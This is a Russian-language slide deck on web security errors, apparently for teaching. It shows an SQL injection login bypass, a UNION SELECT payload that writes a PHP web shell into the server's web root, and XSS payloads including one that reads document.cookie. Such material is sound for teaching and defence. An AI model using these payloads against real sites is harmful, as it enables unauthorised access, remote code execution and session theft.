Ошибки в безопасности
SQL Injection
select login,pass from user where login=‘$login’ and password=“$pass”
select login,pass from user where login=‘test@example.com’ or 1=1 --’ and password=“$pass”
full path disclosure
GOOGLE DORK
XSS
АКТИВНАЯ xss
ПАССИВНАЯ XSS
313.19K
Категория: ПрограммированиеПрограммирование
Похожие презентации:
Тестирование безопасности
Тестирование безопасности
Сессии и Cookie. Безопасность WEB-приложений
Сессии и Cookie. Безопасность WEB-приложений
Сессии и Cookie Безопасность WEB-приложений
Сессии и Cookie Безопасность WEB-приложений
Программирование в MICROSOFT SQL server 2000
Программирование в MICROSOFT SQL server 2000
Курсы «Современные технологии программирования». Базовый SQL, особенности MS-SQL и Oracle
Курсы «Современные технологии программирования». Базовый SQL, особенности MS-SQL и Oracle
XSS (Cross-Site Scripting)
XSS (Cross-Site Scripting)
Безопасность клиентской части веб-приложений. Введение в Cross Site Scripting (XSS)
Безопасность клиентской части веб-приложений. Введение в Cross Site Scripting (XSS)
Основы SQL. Запросы к базе данных
Основы SQL. Запросы к базе данных
Лекции 1-2. Введение в моделирование данных, базы данных и SQL
Лекции 1-2. Введение в моделирование данных, базы данных и SQL
Работа с дефектами
Работа с дефектами

Ошибки в безопасности. SQL Injection

1. Ошибки в безопасности

ОШИБКИ В БЕЗОПАСНОСТИ

2. SQL Injection

SQL INJECTION

3. select login,pass from user where login=‘$login’ and password=“$pass”

SELECT LOGIN,PASS FROM USER
WHERE LOGIN=‘$LOGIN’ AND
PASSWORD=“$PASS”

4. select login,pass from user where login=‘[email protected]’ or 1=1 --’ and password=“$pass”

SELECT LOGIN,PASS FROM USER
WHERE
LOGIN=‘[email protected]
OR 1=1 --’ AND PASSWORD=“$PASS”

5. full path disclosure

FULL PATH DISCLOSURE

6.

• Union select <?php eval($_REQUEST[cmd]); ?> from mysql.user
• into outfile ‘C://xampp/htdocs/s.php‘

7. GOOGLE DORK


Специальные запросы для нахождение того или иного документа в всемирной
паутине

8.

9. XSS

10. АКТИВНАЯ xss

АКТИВНАЯ XSS
Активная уязвимость более опасна, поскольку злоумышленнику нет
необходимости заманивать жертву по специальной ссылке, ему достаточно
внедрить код в базу или какой-нибудь файл на сервере. Таким образом, все
посетители сайта автоматически становятся жертвами. Он может быть
интегрирован, например, с помощью внедрения SQL-кода (SQL Injection). Поэтому,
не стоит доверять данным, хранящимся в БД, даже если при вставке они были
обработаны.
http://www.site.com/page.php?var=<script>alert('xss');</script>

11.

12. ПАССИВНАЯ XSS


http://www.site.com/index.php?login=“><script>alert(document.cookie)</script>
English     Русский Правила